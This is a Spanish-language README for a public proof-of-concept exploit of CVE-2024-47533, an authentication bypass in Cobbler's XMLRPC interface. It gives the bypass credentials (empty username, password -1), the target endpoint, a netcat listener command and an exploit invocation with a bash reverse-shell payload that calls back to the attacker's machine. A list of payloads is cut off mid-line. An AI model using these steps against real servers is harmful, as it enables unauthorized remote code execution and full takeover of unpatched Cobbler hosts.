
La CVE-2024-47533 es una vulnerabilidad crítica de omisión de autenticación en Cobbler (versiones 3.0.0 hasta antes de 3.2.3 y 3.3.7) que permite la ejecución remota de código sin autenticación a través de la interfaz XMLRPC.
⚠️ Ejecución remota de código crítica mediante omisión de autenticación en Cobbler
🛠️ Implementación del PoC por @dollarboysushil
Cobbler, un servidor de instalación de Linux que permite configurar rápidamente entornos de instalación en red, presenta una vulnerabilidad de autenticación en las versiones 3.0.0 hasta (pero sin incluir) las versiones 3.2.3 y 3.3.7. La función utils.get_shared_secret() siempre devuelve -1, lo que permite que cualquier persona se conecte a la interfaz XML-RPC de Cobbler con un nombre de usuario vacío ('') y la contraseña -1. Esto permite que un atacante con acceso a la red obtenga el control total del servidor Cobbler. La vulnerabilidad se corrige en las versiones 3.2.3 y 3.3.7.
La vulnerabilidad se debe al manejo incorrecto del secreto compartido en la función utils.get_shared_secret(), que siempre devuelve -1, omitiendo efectivamente la autenticación. Esto permite que cualquier usuario de la red se conecte a la interfaz XMLRPC de Cobbler con credenciales vacías y ejecute comandos arbitrarios.
http://<target>:25151/ — endpoint de la API XMLRPC de Cobbler
El script de explotación admite varios payloads de reverse shell, entre ellos:
nc, nc2)Inicie un listener de Netcat en su máquina:
nc -lvnp 4444

Ejecute el script de explotación CVE-2024-47533-dbs.py.
python3 CVE-2024-47533-dbs.py -t http://127.0.0.1:25151 -l 10.10.15.16 -p 4444 --payload bash

Tras una ejecución exitosa, la reverse shell se conectará de vuelta al listener, otorgando al atacante acceso remoto al servidor.
